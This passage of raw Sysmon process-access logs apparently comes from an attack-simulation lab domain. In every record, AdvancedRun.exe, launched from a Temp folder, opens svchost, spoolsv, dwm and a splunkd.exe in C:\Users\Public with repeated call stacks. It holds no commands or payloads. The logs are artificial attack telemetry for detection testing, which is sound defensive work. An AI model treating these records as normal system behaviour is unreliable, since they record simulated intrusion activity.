.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004068987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
